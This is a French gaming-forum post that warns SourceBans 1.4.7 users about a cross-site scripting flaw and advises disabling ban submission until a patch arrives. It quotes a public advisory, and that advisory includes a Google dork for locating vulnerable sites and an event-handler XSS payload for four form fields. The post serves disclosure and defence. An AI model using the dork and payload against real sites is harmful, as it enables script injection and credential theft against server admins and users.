Jump to content
News ticker
  • Bienvenue sur le nouveau forum VeryGames
  • Welcome to the new VeryGames forum
  • VeryNews

    SourceBans Vulnerability (XSS)


    cmer
     Share

    Recommended Posts

    Salut,

     

    Il existe un faille sur le sourcebans afin de vous protéger veuillez désactiver le submitBan

     

     

    # Exploit Title: SourceBans Version 1.4.7 XSS
    # Google Dork: inurl:"sourcebans/index.php?p=submit"
    # Date: Feb. 9th 2011
    # Author: Sw1tCh
    # Software Link: http://www.sourcebans.net/
    # Version: 1.4.7
    
    
    Info:
    SourceBans is an application for managing publicly the banned users for a Steam Server. 
    
    #-= The Advisory =-
    SourceBans is vulnerable to a Cross Site Scripting Vulnerability (XSS) in which an attacker can execute scripts on a client side resulting in a bypass of access controls and or a credentials loss.
    
    #-= Example =-
    
    http://<SITE>/sourcebans/index.php?p=submit
    
    - > BanIP => " onmouseover=prompt(928137) bad="
    - > Comments => " onmouseover=prompt(928137) bad="
    - > Name => " onmouseover=prompt(928137) bad="
    - > Email => " onmouseover=prompt(928137) bad="
    
    
    
    
    #Disclosure Information:
    - Vulnerability found and researched: January 18th 2011
    - Vendor (SourceBans) contacted: January 18th 2011
    [ Time Reduced because Ops of IRC channel were dicks ] 
    - Disclosed to Exploit-DB, Bugtraq and InterN0T: 
    
    
    
    
    
    #Credits: Sw1tCh
    
    #Shoutouts : gen0cide, Scruffy, Griff, D00dl3, 

     

    Un patch devrez voir le jour bientôt :)

    Link to comment
    Share on other sites

    Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.

    Guest
    Reply to this topic...

    ×   Pasted as rich text.   Paste as plain text instead

      Only 75 emoji are allowed.

    ×   Your link has been automatically embedded.   Display as a link instead

    ×   Your previous content has been restored.   Clear editor

    ×   You cannot paste images directly. Upload or insert images from URL.

     Share

    ×
    ×
    • Create New...